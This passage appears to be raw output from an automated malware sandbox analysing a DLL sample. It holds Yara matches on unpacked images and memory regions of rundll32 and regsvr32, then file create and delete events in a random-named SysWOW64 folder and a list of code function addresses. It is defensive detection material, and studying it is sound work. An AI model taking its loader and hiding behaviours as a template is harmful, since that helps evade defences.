                      Source: Yara matchFile source: 10.2.rundll32.exe.720000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4980000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4ea0000.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4e70000.18.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.49e0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ea0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.ed0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4790000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4790000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4540000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4950000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4ea0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5010000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4fb0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.47a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47c0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4f70000.20.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4f70000.20.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.47f0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4fd0000.22.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4740000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.690000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4bc0000.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4b90000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4970000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4960000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.4d20000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4820000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4ca0000.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.690000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.47f0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.4c70000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.49b0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4630000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47f0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.308556502.0000000004971000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312426426.0000000004790000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.303864837.0000000002E50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.308717246.0000000004ED1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.312591906.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.310675126.00000000006C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.308496197.00000000047A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818600479.0000000004CA1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.816263427.0000000000551000.00000020.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312707880.0000000004991000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818149949.0000000004821000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312062487.0000000004571000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.303938818.0000000003091000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312157578.0000000004630000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.308585132.0000000004D20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.303434167.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.310610436.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818434536.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818253319.00000000049B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.308691982.0000000004EA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312211500.0000000004661000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818342645.0000000004A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.816816895.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818930567.0000000004F70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.308783720.0000000004FE1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312650834.0000000004960000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818769110.0000000004E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818077767.0000000004741000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818990382.0000000004FA1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818118455.00000000047F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.311999484.0000000004540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.312633523.0000000002E61000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818553417.0000000004C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312609575.0000000004821000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818862903.0000000004EA1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818277549.00000000049E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.819036173.0000000004FD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818224414.0000000004981000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818194001.0000000004950000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.819084555.0000000005001000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312500126.00000000047C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.303487631.0000000000ED1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.816889903.0000000000721000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.816215619.0000000000520000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.308811399.0000000005011000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.308759081.0000000004FB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818044267.0000000004710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818377834.0000000004AC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.818471974.0000000004BC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.312556159.00000000047F0000.00000040.00000001.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: pugKLanrj3.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Ubjbeaftth\ufcmfnoys.ulp:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Ubjbeaftth\Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100200112_2_10020011
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100181CA2_2_100181CA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001929D2_2_1001929D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002542D2_2_1002542D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100274AE2_2_100274AE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100265752_2_10026575
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001869D2_2_1001869D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100168602_2_10016860
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002596F2_2_1002596F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10022A5C2_2_10022A5C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10018A712_2_10018A71
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001AAB72_2_1001AAB7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001CB162_2_1001CB16
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10018E7D2_2_10018E7D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10025EB12_2_10025EB1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100200113_2_10020011
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002542D3_2_1002542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100274AE3_2_100274AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100265753_2_10026575
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001178A3_2_1001178A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100168603_2_10016860
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002596F3_2_1002596F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10022A5C3_2_10022A5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001AAB73_2_1001AAB7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001CB163_2_1001CB16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10025EB13_2_10025EB1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030AEFDD3_2_030AEFDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A85FF3_2_030A85FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030B2B093_2_030B2B09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A53333_2_030A5333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309F3693_2_0309F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03096B7A3_2_03096B7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309238C3_2_0309238C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309FB8E3_2_0309FB8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03094BFC3_2_03094BFC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A7A0F3_2_030A7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A9A013_2_030A9A01
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A42443_2_030A4244
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030AB2573_2_030AB257
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030B32633_2_030B3263
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A4A663_2_030A4A66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030B0A643_2_030B0A64
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309BAA93_2_0309BAA9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030AA2A53_2_030AA2A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A0ABA3_2_030A0ABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030ACAD53_2_030ACAD5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309D14C3_2_0309D14C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A21423_2_030A2142
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030AE9553_2_030AE955
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A017B3_2_030A017B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A61873_2_030A6187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030921943_2_03092194
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030AD1BC3_2_030AD1BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030AE1F83_2_030AE1F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030B20093_2_030B2009
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A88063_2_030A8806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309B8203_2_0309B820
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030AF8403_2_030AF840
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030970783_2_03097078
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309A8713_2_0309A871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030980C03_2_030980C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030AD8DB3_2_030AD8DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309F0E93_2_0309F0E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030B00EF3_2_030B00EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309670B3_2_0309670B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309EF0C3_2_0309EF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03091F383_2_03091F38
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030AFF583_2_030AFF58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A57793_2_030A5779
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A4F743_2_030A4F74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A97743_2_030A9774
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A0F863_2_030A0F86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030B07AA3_2_030B07AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A8FAE3_2_030A8FAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030977A33_2_030977A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030957B83_2_030957B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030B17BD3_2_030B17BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309BFBE3_2_0309BFBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309E7DE3_2_0309E7DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A67E63_2_030A67E6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030986363_2_03098636
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309E6403_2_0309E640
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A2E5D3_2_030A2E5D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03097E793_2_03097E79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A567B3_2_030A567B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309DE743_2_0309DE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A3EAA3_2_030A3EAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030B36AA3_2_030B36AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309C6B83_2_0309C6B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A0EBC3_2_030A0EBC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030B46BD3_2_030B46BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030B3EE93_2_030B3EE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030ABEFD3_2_030ABEFD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030AAD083_2_030AAD08
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A55153_2_030A5515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A8D3D3_2_030A8D3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A654A3_2_030A654A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A7D5B3_2_030A7D5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030B2D533_2_030B2D53
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A3D853_2_030A3D85
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0309C5D83_2_0309C5D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030AC5D53_2_030AC5D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030955FF3_2_030955FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_030A9DF53_2_030A9DF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D4A664_2_006D4A66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CDE744_2_006CDE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DB2574_2_006DB257
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C86364_2_006C8636
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D7A0F4_2_006D7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E20094_2_006E2009
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D654A4_2_006D654A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D21424_2_006D2142
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DFF584_2_006DFF58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DE9554_2_006DE955
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DAD084_2_006DAD08
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C670B4_2_006C670B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D85FF4_2_006D85FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DEFDD4_2_006DEFDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CC5D84_2_006CC5D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E17BD4_2_006E17BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E0A644_2_006E0A64
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E32634_2_006E3263
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C70784_2_006C7078
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C7E794_2_006C7E79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D567B4_2_006D567B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DA4744_2_006DA474
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DDC714_2_006DDC71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CA8714_2_006CA871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CA4454_2_006CA445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D42444_2_006D4244
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CE6404_2_006CE640
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DF8404_2_006DF840
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C74424_2_006C7442
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D2E5D4_2_006D2E5D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CB8204_2_006CB820
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C34314_2_006C3431
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D88064_2_006D8806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D9A014_2_006D9A01
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E00EF4_2_006E00EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CF0E94_2_006CF0E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E3EE94_2_006E3EE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DE4E54_2_006DE4E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DBEFD4_2_006DBEFD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C80C04_2_006C80C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DCCD94_2_006DCCD9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DD8DB4_2_006DD8DB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DCAD54_2_006DCAD5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E36AA4_2_006E36AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CBAA94_2_006CBAA9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D3EAA4_2_006D3EAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DA2A54_2_006DA2A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C1CA14_2_006C1CA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D0EBC4_2_006D0EBC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E46BD4_2_006E46BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CC6B84_2_006CC6B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D0ABA4_2_006D0ABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CF3694_2_006CF369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D57794_2_006D5779
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C6B7A4_2_006C6B7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D017B4_2_006D017B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D437A4_2_006D437A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D4F744_2_006D4F74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D97744_2_006D9774
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CD14C4_2_006CD14C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D7D5B4_2_006D7D5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E2D534_2_006E2D53
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D8D3D4_2_006D8D3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C1F384_2_006C1F38
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D53334_2_006D5333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CEF0C4_2_006CEF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E2B094_2_006E2B09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D55154_2_006D5515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D67E64_2_006D67E6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C4BFC4_2_006C4BFC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C55FF4_2_006C55FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D27F94_2_006D27F9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DE1F84_2_006DE1F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D9DF54_2_006D9DF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D07F44_2_006D07F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CE7DE4_2_006CE7DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DFBDE4_2_006DFBDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DC5D54_2_006DC5D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D8FAE4_2_006D8FAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E07AA4_2_006E07AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C77A34_2_006C77A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DD1BC4_2_006DD1BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CBFBE4_2_006CBFBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C57B84_2_006C57B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C238C4_2_006C238C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006CFB8E4_2_006CFB8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D3D854_2_006D3D85
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D61874_2_006D6187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D0F864_2_006D0F86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006C21944_2_006C2194
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049920097_2_04992009
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04987A0F7_2_04987A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_049786367_2_04978636
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497A4457_2_0497A445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497DE747_2_0497DE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04984A667_2_04984A66
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498EFDD7_2_0498EFDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0497C5D87_2_0497C5D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0498AD087_2_0498AD08
